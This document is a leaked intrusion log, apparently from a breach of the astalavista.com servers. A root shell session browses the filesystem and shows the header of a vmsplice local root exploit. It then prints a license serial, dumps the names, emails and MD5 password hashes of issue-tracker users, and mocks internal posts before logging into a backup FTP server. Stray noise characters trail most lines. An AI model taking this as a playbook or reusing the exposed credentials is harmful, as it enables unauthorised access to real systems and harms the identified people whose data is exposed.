drwx–x–x 10 com com 4096 Apr 28 12:40 .
& Q( N3 \8 g, C' R) o& ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ e( c1 |& s5 \; A
drwx—— 2 com com 4096 Jun 4 04:04 backups
$ O( Y/ D# L( G9 K4 L8 }9 {-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
b: q$ {( \- Fdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system7 R! A" e7 f, f2 [
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
) s6 U4 ]9 C4 F3 C* R% G1 k8 ]; O1 l-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout/ O' T1 [) Q$ J, y
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
! l: f: a! e8 {/ n! p! ]' m9 K. b) `-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc: }5 H! A, K1 X: q1 h% M; `
drwx–x–x 3 com com 4096 Jan 29 2008 domains i: U' ^' u& k c& d% w
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed/ H3 h( A( e/ _; M+ Z& f
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap9 Y# L7 {( o; ~7 D* T4 Y% ^* F
-rw——- 1 com com 69 Nov 18 2008 .lesshst0 I, @6 R5 @0 Q
drwx—— 2 com com 4096 Sep 24 2007 mail
' L2 W: I$ M$ x-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history T' d6 c5 @8 @- Q- A O2 x' W) [
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
) Z9 h' Q+ M, E. z: r6 l% Q. z/ Xlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html7 e3 F9 x6 ~/ Z
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
% F1 B& U: H) e! A5 |! }drwx—— 2 com com 4096 Aug 26 2008 .ssh
( Q6 c! M: ~3 j, J9 n( c: A-rwx—— 1 com com 8515 Feb 10 2008 t
3 O7 m& c+ I) p+ M7 z! k5 O4 A8 q- n$ r-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c2 T" U1 z; T b6 b5 _/ I' I
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
3 U* Z: h e! s: N-rw-rw-r– 1 com com 617 May 20 2008 .toprc
4 w: Z5 R& a. V2 O-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql/ Y( Q u# A6 P% g
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
( G- f, i1 \ |! B5 Z-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
/ c9 C# o: h) q$ _( v
6 M" F6 Q7 ]; p# ^1 I# u- dsh-3.2# head t.c
# u) Z: L; O$ P$ q3 o7 l, \, f/*, ?) C/ `* W5 N& m3 e+ ]- R# y
* jessica_biel_naked_in_my_bed.c
$ ]% _1 t" e% Q8 z*
! @% ^# M5 ?6 o8 W- n* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.) ^& Q: |* \/ |7 h$ G: H$ x8 J
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca." |0 I' X+ O0 d! g/ L4 C% A4 o
* Stejnak je to stare jak cyp a aj jakesyk rozbite.& r3 m! d/ _- W1 Y$ x4 J, ?
*
+ ~; _2 v0 @1 q8 G" c& q* Linux vmsplice Local Root Exploit% F) v; I) o8 y$ i1 m
* By qaaz6 X- _; ?! j/ ^4 Z& `# ^% t
*- [" R( C5 E- {
; u; i; ^$ W- d9 A9 K3 @! m
sh-3.2# cd /6 E0 w* w4 C0 E, P6 s& R
sh-3.2# ls -la8 K0 Z8 [! t7 d
total 360
* M: g, F/ u5 e) f" q N5 [drwxr-xr-x 25 root root 4096 Jun 3 02:43 .+ X( G" s1 a7 G1 w/ \; \& ~# J' A
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .., {! E3 I/ D/ U8 x8 e- t f# Q
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
5 Q7 |" a- w" k8 T ?$ u% j-rw——- 1 root root 10240 Jun 3 02:39 aquota.user2 y x8 x8 ]# `$ z9 K
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
* t# o* ^) y- b" Q) ?-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
9 c: i7 d' Q* B6 p/ f: G-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel m4 f3 Z5 C/ T: M
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
1 x( h8 u4 }3 k) w, ]drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin3 j- H5 B. H" M+ b* g
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
% L3 }$ q* I6 f( P& xdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
1 x+ I! b% @7 f. c, I6 Gdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
4 \" W- S, s9 ]% N$ a% `2 ~3 W: fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
' w# x1 j! e* x2 }+ J" t: u-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
- v+ } _* \& ]drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
/ F2 Y/ Y# d# W& P6 Ddrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64* l. n) V/ a/ F- A
drwx—— 2 root root 16384 Sep 11 2007 lost+found
% u! d' I, F c) }drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
! Z% w- s$ i Kdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
3 b# T- k8 C) G* Ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
8 p9 S( ]$ {" S, G9 R4 ]; }-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg3 N Q& h# `+ L5 Q V
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
. ~! h: c# T/ `+ X6 T1 p0 [drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt! C9 m3 x' k! s1 h
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
% r6 t( }3 V; \& E' |drwxr-x— 15 root root 4096 Jun 4 08:40 root; D6 d( V+ b* K/ p0 q s
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin' e8 D( R( W& G) u
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux3 R3 |' p) _' m5 l- L
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv. q9 g, H A, x/ r
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
8 n% h, w O8 p) K% e* S6 Zdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
' K( G0 |$ A5 w; U Idrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr9 O. \$ v) B/ J/ N' c# k
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var4 b, h9 L1 ]$ q/ ?2 l, u
( }5 H) R/ g: r0 F# wsh-3.2# cd opt1 h. r1 @( Z4 ]. o b
sh-3.2# ls -la
7 s5 c- ?( y# q7 Y) u9 Ctotal 20! h% R( E$ q" f/ N: _+ u# Q
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
3 I, ^2 d! P5 h8 q8 H$ Wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: k0 ?5 N& E! T( ^8 Kdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
6 l2 y0 L6 Q2 Z- n; p1 }! H, U7 O' R! s# i, V
sh-3.2# cd lsws/
7 a& C% B8 W' V# c+ ]3 S+ N4 bsh-3.2# ls -la% d6 A$ r" ~( C, y7 o: p+ Q4 z
total 108( Q) E1 z( \9 K
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
' N) u6 }' j' A+ e) N" I, w2 x& Z3 mdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
/ p( S4 J3 C1 @9 E! V' d+ @drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
9 Z( \) Y8 X; x3 Kdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
. s5 g1 }; H; ] p% w% s2 y. b1 xdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
6 i+ o! G9 ^' S; c9 ]3 k Y* {2 Gdrwxr-xr-x 2 root root 4096 May 29 15:10 bin6 C, p$ L6 w/ s, u& G
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
0 E5 u4 ^: r# p$ _1 X- A+ Y4 c3 S: Xdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
' f7 Z7 e. a9 x- f R- y; t: u/ ldrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
/ f2 r0 N6 c( B1 p Gdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin, I6 d$ s& C( Z1 Y. a1 P
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib, S( R5 ]7 d, A4 V5 Q: a' ] y
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
0 o1 m2 z9 J# |) L+ k6 Y/ x-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
7 L6 @0 a# C0 r-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
1 X- _- i0 u# f* h-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP- l$ i9 ?+ [7 f1 t$ G+ V1 ]5 `- [
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs m, Q2 Q6 u4 z5 h
drwxr-xr-x 2 root root 4096 Mar 20 2008 php, R# N5 ?! N2 Y {+ U
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
% D8 y% f h) R& \drwxr-xr-x 3 root root 4096 Mar 20 2008 share
/ j- P# Q' U0 _7 C! W-rw-r–r– 1 root root 6 May 29 15:10 VERSION
3 i. V$ \% v' x/ \/ I
5 p- r" B# s0 {% psh-3.2# cd conf; I$ T( H( ]# R5 A& H1 `0 X
sh-3.2# ls -la! w* @3 D1 C* W' s: w5 p) o* B
total 48. Y$ C; F, P d: t# F
drwx—— 4 apache apache 4096 Jun 3 02:43 .$ {; K N y3 N
drwxr-xr-x 15 root root 4096 Mar 20 2008 .. ~( c7 Q- |. `" V% U8 F' f: E
drwx—— 2 apache apache 4096 Mar 20 2008 cert
. k0 J: d [( a9 t! |1 t-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
9 c5 p7 E+ @! m# N: U- Y& K-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
$ x) W; t/ `0 T-rw-r–r– 1 root apache 0 Jun 3 14:11 .last. b" o1 T5 f& T- q- g
-rw——- 1 apache apache 256 May 29 15:10 license.key
8 {( g8 P+ v6 l- L: P-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
3 { j6 d: T4 y1 J, E5 l+ m-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties# o) B. D, N7 ]% m* \1 C0 @( N4 i
-rw——- 1 apache apache 20 May 29 15:10 serial.no# z/ ?0 R- V2 K6 s" } @% K
drwx—— 2 apache apache 4096 Mar 20 2008 templates
$ O0 Z* ~5 O% i2 _- j
# z9 r6 h2 V; q; gsh-3.2# cat serial.no
; ?4 p) n9 r: s/ D- X W1 bIbDl-oVsO-CKqL-wVRa
! l0 p1 i. W9 `% K; a2 Z* |- S& Z- R6 l& y8 o9 d
sh-3.2# mysql' z6 l E$ a1 G- b, t
Welcome to the MySQL monitor. Commands end with ; or \g.
; b6 ?! r+ H$ Q+ A. w; w' D8 i( MYour MySQL connection id is 2868441 k& s; P# B' D9 V Y, y
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
! a6 ^/ x: `2 [
' U4 Y; T1 E& @+ g$ G3 h" [* ZType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( a" H5 y6 m' k8 J; U) d$ }& v, @9 I' @* X- S& q) A' F
mysql> show databases;
: j L) w$ {5 |6 H+———————–+
" P1 R5 t0 {- d* z| Database |* W! R- m( ~+ `) e3 H) B
+———————–+
# l( t( g2 }* s e5 s| information_schema |
1 \) g: P, Q% Y( q6 V1 C: X( W| astanet_ads |
# F, | C: U/ k& ~% m- j0 U| astanet_mailing_lists |- v- p! Z/ K: f
| astanet_mediawiki |: d, h- p3 t9 \% }
| astanet_membersystem |' j- P2 c5 F ^$ t+ n
| com_contrexx |" h' |$ ?1 W2 q, ~
| com_contrexx2 |
+ q6 D9 t9 @! ]. [| com_contrexx2_live |/ n c4 D/ L: a2 N0 \3 H% q
| da_roundcube |
8 A+ j4 k9 `7 X" {| dolphin |
$ e' a0 q8 a$ Y6 A- G* `| ideapool |
, @& M5 J# I s: Z5 e5 d| mysql |
[8 P0 s% G" @5 C' {. y| test |
6 N7 U0 w, b; w. f1 b( u! a( u| yourmaster |
2 R* O/ B% Q6 @+———————–+
8 K. k; n4 T# ~0 y& f2 Q, G) n! g3 I14 rows in set (0.00 sec)4 Z. z# |& r4 t& c/ c
7 m" x5 U, [: f- i
mysql> use ideapool
4 Y- g! H1 y0 k1 s* s T9 DDatabase changed# j. l8 O7 U# h
mysql> show tables;
3 c) s0 G2 U6 i, B$ h$ K; Q+———————————–+; W8 r8 n+ P+ {0 R* h4 Q
| Tables_in_ideapool |8 I1 S+ g! c% i2 l N1 d) I2 O: L
+———————————–+# r5 b D4 U0 ~" z( [, s0 G ]
| eventum_columns_to_display |
) A8 I4 _6 T v. `| eventum_custom_field |
* s5 \$ g! M$ e! S% z7 j* h1 ^| eventum_custom_field_option |& y% h* i# s$ |7 d
| eventum_custom_filter |
0 i' S0 _( b V$ {" A6 o| eventum_customer_account_manager |# M2 W2 R# H6 U0 N' E/ l( C9 v$ {
| eventum_customer_note |" ~! x2 P5 G4 v' {, X6 _8 D- Q7 o! ?
| eventum_email_account |: G, V$ W* k B( \2 x; P( N
| eventum_email_draft |& q4 s0 o: s7 m E- f
| eventum_email_draft_recipient |
2 q" V: \1 `' j+ u| eventum_email_response |+ \4 l" |; M- b
| eventum_faq |
7 M% w4 t6 C( B3 n| eventum_faq_support_level |' g. G8 I7 c1 O+ D8 c+ N/ _2 C' U
| eventum_group |
D6 ` g# T" _' G| eventum_history_type |2 U2 H8 _2 K1 ]9 ?: D* p
| eventum_irc_notice |
' g( k W7 j- t3 {. j| eventum_issue |
" g, k- U' h) S$ \| eventum_issue_association |
3 |4 ^3 v' @& a1 c| eventum_issue_attachment |
9 v( h5 M6 ~4 |& m2 [$ }8 [) t| eventum_issue_attachment_file |1 J6 i! C- I- h7 e+ q
| eventum_issue_checkin |
' ]8 N6 X6 s" r5 P1 X* |! |/ T| eventum_issue_custom_field |
. U# b. V! y- e& s) d1 M| eventum_issue_history |2 X" q& V: d* u" y& g
| eventum_issue_quarantine |0 ]6 x% a4 Z' e( q% L4 b0 ^
| eventum_issue_requirement |
7 |8 ~: y% }0 b2 L# R# ?| eventum_issue_user |3 L) b$ P, V2 K0 `
| eventum_issue_user_replier |
. X) A& b( Y" j( l$ E- O- Z# _9 U| eventum_link_filter |
- L# B& x6 \3 y: b2 g; |% m- K$ D$ Q| eventum_mail_queue |( X- X3 j) `: K5 Y# l9 E- l! G# D
| eventum_mail_queue_log |- o6 Q% p5 s4 H/ X8 S% Q7 c, I
| eventum_news |, W0 q2 {4 B7 i! x" o* [
| eventum_note |
9 v8 z, k$ Y6 u| eventum_phone_support |
5 i: }5 I3 X: a6 Y| eventum_project |
+ w- R; e4 q A2 E| eventum_project_category |
! t/ |6 {& R4 G1 k- o, d' y| eventum_project_custom_field |
4 a" w5 R; n( A| eventum_project_email_response |
Y0 _1 l7 @' g f0 a; B; U8 T: N| eventum_project_field_display |
e# j1 C- ~6 p+ e/ c9 @- E| eventum_project_group |
: b+ j E. ~1 j; c. o% r g. y; d| eventum_project_link_filter |
7 t* d" w/ l8 u5 Q| eventum_project_news |
! G* s1 I- U/ K# o| eventum_project_phone_category |
6 v# D5 b9 x0 G| eventum_project_priority |
4 |( g8 T8 m0 c( g| eventum_project_release |
" ` f% T7 y, m( L' N| eventum_project_round_robin |: R' J9 j- B' F: q( C0 T+ F" L
| eventum_project_status |
: K: m/ K% T- j+ k1 X% J3 n| eventum_project_status_date |
; p& t8 O" T B8 `: R$ L: Z| eventum_project_user |2 X! e# H' G$ v+ B$ V
| eventum_reminder_action |
% a" l1 J8 W: I) p) W& `| eventum_reminder_action_list |5 Y# a. q: X! E! r" S4 Q, [% N: i
| eventum_reminder_action_type |
6 P7 x, z6 m" g* D: b- X| eventum_reminder_field |1 X. Y& s! J/ Q
| eventum_reminder_history |
w. J: E- F6 u4 R5 E. D1 I| eventum_reminder_level |
$ j M. Q, G2 T: W* H r" ^| eventum_reminder_level_condition |
: [1 n" @: F/ L; x5 K| eventum_reminder_operator |; x: Y7 p& \% H9 y" D! K* B
| eventum_reminder_priority |8 P7 Z+ f+ F; W7 b: G6 j. A$ ~( j- e
| eventum_reminder_requirement |/ Q$ {# Q3 J6 e- m1 ?; J) {
| eventum_reminder_triggered_action |
b$ S& W! O( X3 U# ]| eventum_resolution |
+ C& [ v! F' I& D0 `0 H# m| eventum_round_robin_user |
# X, H. c' j) f| eventum_search_profile |6 W2 g: W( j, d# {7 e+ K
| eventum_status |( k; C. e/ j2 d7 b5 k9 ?
| eventum_subscription |% _$ z$ J7 o% L0 T$ v( A9 J
| eventum_subscription_type |
! p3 \) D% {3 U: ~+ U. ?| eventum_support_email |
0 X. ?+ \* [9 a) n1 O% q6 r| eventum_support_email_body |5 c/ M; ^4 q* {( F
| eventum_time_tracking | p& F8 g4 k; c0 c2 B1 b
| eventum_time_tracking_category |2 |9 e2 p! m; V( c
| eventum_user |! c z3 \& \# Q& X
+———————————–+
6 T# h- l) W7 [9 u9 W" T( A. O69 rows in set (0.00 sec)5 f0 H, O. v! G
1 s, ?) v- w9 J' ]2 v! V( p6 e: k/ w; vmysql> describe eventum_user;
7 T! t7 R$ @" c i+————————-+——————+——+—–+———————+—————-+: G. ?$ V: i# `1 [% u/ B' |
| Field | Type | Null | Key | Default | Extra |
, L& |5 k1 `$ l) f+————————-+——————+——+—–+———————+—————-+
( `2 B5 e7 c7 d+ ?. ^; r2 M! ?3 p| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
$ `3 x" d9 |; c| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |. B6 m, t E2 c! R8 \4 b: J0 w9 _
| usr_customer_id | int(11) unsigned | YES | | NULL | |
8 u; `# I m0 \| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |: ?. a+ I5 z0 D! u5 L0 i
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |. u3 ~ [5 Y( q& D: d
| usr_status | varchar(8) | NO | | active | |
0 M6 N: c: ]( _- {| usr_password | varchar(32) | NO | | | |
7 r$ z0 Z7 q6 G* q% ]) h| usr_full_name | varchar(255) | NO | | | |
! n0 o2 g% h% Q+ J0 Z+ i| usr_email | varchar(255) | NO | UNI | | |) e u6 _2 A8 a G
| usr_preferences | longtext | YES | | NULL | |
( r6 ]1 G+ h) j. X& \" Z7 b C L7 z| usr_sms_email | varchar(255) | YES | | NULL | |
$ a P5 d+ a; s- Q# F+ K| usr_clocked_in | tinyint(1) | YES | | 0 | |* Y( b7 I* b( {/ X: n) o3 i$ j" h
| usr_lang | varchar(5) | YES | | NULL | |2 D; S$ {+ C5 \/ W1 }
+————————-+——————+——+—–+———————+—————-+
3 I! B( C* e: p9 X13 rows in set (0.00 sec)
1 o2 l9 n$ b$ e
7 V0 p+ c- |5 a' f7 x3 Xmysql> select usr_full_name,usr_email,usr_password from eventum_user;
6 X7 B8 k0 Z( T' x1 D! a" S+———————-+——————————-+———————————-+
0 @/ ~" t; q" O! Z* Q| usr_full_name | usr_email | usr_password |
8 T, R/ K" u+ y. D& M: t+———————-+——————————-+———————————-+
1 f3 d" C3 p! G' u# N' W) M( \| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |8 o D- ^8 k9 |5 e- Q( E
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
0 G4 d; Y' G' @. B8 Q+ R: r- P| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
- L1 g8 s, @! r. H; i2 H| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
5 G3 n" ?+ z- O n5 @| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |+ I( g; G2 d0 I1 n* w$ c
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
& F; `: `8 e: }: Z! V( || Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |; M: ?3 c5 V2 P8 d' Z4 c' Q' }" V* n
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |0 \% Q7 C) V/ C1 s- Q$ W
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
! B& b* N/ D9 [& ~0 ?4 M| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |9 p d2 [ u9 M1 c
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
4 t4 ^# |9 @2 e( C- |( ]| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |: Y q j8 R" D5 y' k
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |) r& _9 q7 S& I7 ?
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
% r9 V0 ^# x. b+ y| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
9 I9 H( J6 ], c# i9 D$ d, x5 C0 ~+———————-+——————————-+———————————-+
' {& M, j' p' A$ C5 V3 X15 rows in set (0.00 sec)
& M: f; a2 K' y" o4 Z9 J
; y( O+ f! x- a# i' P6 P; O' pmysql> select iss_description from eventum_issue where iss_id = 43;+ C3 A( H, h2 z
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+6 f& ^8 g: E2 l. [" s
| iss_description $ f; c+ D) D) w
|, d6 ?! H2 H" R# w1 `
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! [6 ?9 J7 W2 s| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
+ x5 X0 Y: B' y" C4 ?connected for 90 mins… 120mins… so what i propose is something like:
2 h% e, N. F% n链接标记[url]http://www.surfthechannel.com/[/url]
- i9 Z9 _2 Y. ^since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
. m. k4 q# P1 S8 s% o; ^+ U7 Elike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
, d4 J: w8 c- H8 W# m' tbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off* E6 B, t, g5 v/ t& y3 l5 T
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
8 _: t% W1 V5 ^4 w* b" a2 b6 a2 V1 E# M& {; R' S( I
We could also put advertisement during play on the flash video player itself… extra $$…
: P. [6 I. g% ^* j; O3 i& o7 v" H& x+ F/ q) t6 j; N
By sykadul |! F. H2 w7 }5 j8 g3 l+ [: ~# |) D
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 R) M( _) G* q
1 row in set (0.00 sec). i* U5 n: |4 {/ W
" c+ ^0 p0 M0 P# R! j% y
// Money and extra $$ is all they care about. remember that.8 N1 Y }' I% j: ^7 D
: ~# q0 S* d2 ]6 h. H8 Y. hmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;3 X3 k, y: G5 ]- _# d
+————————+——————————————————————————————————————————————————————————————————————————————-+
& `# D& V3 C1 C, x$ u0 o| iss_summary | iss_description
5 C, ^* L1 l6 s1 ], s1 v/ ^0 q|( V2 z9 }/ q0 ]$ M5 n
+————————+——————————————————————————————————————————————————————————————————————————————-+: b" |5 p8 Z7 v4 ~' F% I$ k W
| Forum for REAL EXPERTS | Hello,
2 L+ u3 b$ q, K1 t8 c5 P f+ N0 |& e8 q5 ?/ e6 z0 C
Ishtus and I,( [0 i+ w; V8 y ~" H
: r/ y- a6 T: W4 p5 e- {$ [! f
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
4 k5 e# E2 }% s4 ?0 ?( g# d2 R- \! [ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..- O3 N) k0 a2 \
- Q, M9 z6 D. ?. L( u, F. D# Z
One example a friend of mine from coresecurity.com!
# O& w+ A0 w! X' T0 i5 n' }( b' G
/ w8 c+ s4 v3 j4 m" I h; UWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..7 O" c8 Y$ m& A1 _& j, p/ N+ k
' m( Z, @8 e! C5 l7 l/ n|0 C) Q8 `$ \- X. u8 X5 I
+————————+——————————————————————————————————————————————————————————————————————————————+
$ L. F" s p' q$ [2 Z# S1 row in set (0.00 sec) K+ i& t8 d7 l% w% i8 R) _
9 g, k, |3 L* \+ C4 t+ H! a3 L
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…/ r* n; A: |3 x8 I( F1 Q% d& n8 o% I
4 L( k! A4 N+ z/ q' a! y' p6 A
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;' L! A# o M+ L4 n4 H
+——————+———————————————————————————————+! D1 n& Q \, b
| iss_summary | iss_description |
0 F. _6 @) M7 d+——————+———————————————————————————————+
3 v- {0 |, _! Q' w6 q# p| Website guidance | Virtual Girl which guides you trought the website.! t7 p6 t+ _1 t6 S1 v, A& |) K, z
1 I. ^/ F1 b0 u& E) B9 mWe need a girl with who you can ( talk )!!!
6 L+ f7 z& q, Y- c" FAlso for the News!
9 p o- A" J9 v/ O* }8 J4 H2 [So my suggestion is a girl who read you the news loud if you like!0 B/ B) k' S7 ?% l7 I, B
you can choose between read yourselfe or she read it for you or both!% }" t4 F' [/ _4 c3 K
% x2 d( }5 O& n! g$ X, ?
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!* ]& V# G# e2 T6 F/ F) X0 W" u
. c1 Y6 ~/ y; T/ p
Have a look on the example girls!!, p" v+ a# K5 b
* V6 ^! X6 N, ?* V
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
& Q& `1 O( u# T; A4 b. e. x
& G% T; C s" For that- q$ W: ?1 L3 {
: B1 {' ]- h: |+ K链接标记[url]http://www.yellostrom.de/[/url]* q4 ~# D0 \6 n" E& _
/ u# u+ f P# }) X$ C
|5 ]+ T: _5 k( ~ D! s, a
+——————+———————————————————————————————+5 B* a8 e2 m/ |, d1 V
1 row in set (0.00 sec)! T/ Q1 L. O3 W/ }, R A6 `( K
( J8 m9 D. ~! g$ B// ha ha.
9 w# i ]$ K) s* d" ^, r. K5 c
8 M @, e" C. `; r5 X, Mmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;4 M9 a' q' _# o$ d6 D% x B
+————————–+———————————————————————————————————–+
1 o- q9 J A5 d6 E3 a| iss_summary | iss_description |
$ X$ l/ q8 J7 F: y+————————–+———————————————————————————————————–+
2 x. J& @% B* ^; v2 @6 ~) m| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
' T+ T% A3 W6 L( J q% a3 h. A+————————–+———————————————————————————————————–+
7 @6 x% p( k# @0 m+ J1 row in set (0.00 sec)& n; [1 n( ?1 u$ W) b
. j8 f, ?3 A' t! x8 A X
// LOL.
8 j. O4 u8 P/ r/ Q; t! ]+ q2 b1 Q* ^# x# T& }6 F- Y) {
mysql> exit
* X- z- l3 R; ?0 hBye, s% [, d! _3 h9 e8 P
, W* ~) V; j: Q4 ]
sh-3.2# ftp 212.254.194.163
" |: b+ s# x4 W( M( CConnected to 212.254.194.163.8 }/ `) F% g& b9 Y3 @
220 BackupCOM_VW FTP server ready.
- H6 O# x) T' Y; [; }; i s504 AUTH: security mechanism ‘GSSAPI’ not supported.
) Q& i2 A) f w4 x6 I+ |504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.9 t) F* @4 p& g
KERBEROS_V4 rejected as an authentication type% M' z S6 |+ p. X0 r2 r
Name (212.254.194.163:root): astalavista.com
5 L' B( s% l9 y/ G, V2 `8 @331 Password required for astalavista.com.
$ C1 N& Z8 B6 f- l& ~Password:
8 U- y4 m& k+ v4 I$ n230 User astalavista.com logged in.
$ w' X+ I i: |& D4 S; ^0 r7 ?Remote system type is UNIX.
9 m: I" s5 ~- H' H% K# t* zUsing binary mode to transfer files.
" m( z" z7 L$ J) D: dftp> ls -la. y# i) J' c x- ? y. a( | i
227 Entering Passive Mode (212,254,194,163,2,188)1 X1 |" ^' Y, V" a- |$ `; G3 z) F& @
150 Opening BINARY mode data connection for ‘file list’.1 w3 U/ u% L8 n% p: L" u! ^) m
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com0 e; j2 q0 z1 h5 [3 Z
226 Transfer complete.; j8 q6 {& m# Y4 M+ K) b, Q" S
ftp> cd astalavista.com/ T; @' e3 J0 U8 Z
250 CWD command successful.
4 D z8 y; f3 ~: ]5 N9 qftp> ls -la
. t4 U) j( ~; h- Q/ W227 Entering Passive Mode (212,254,194,163,2,189)
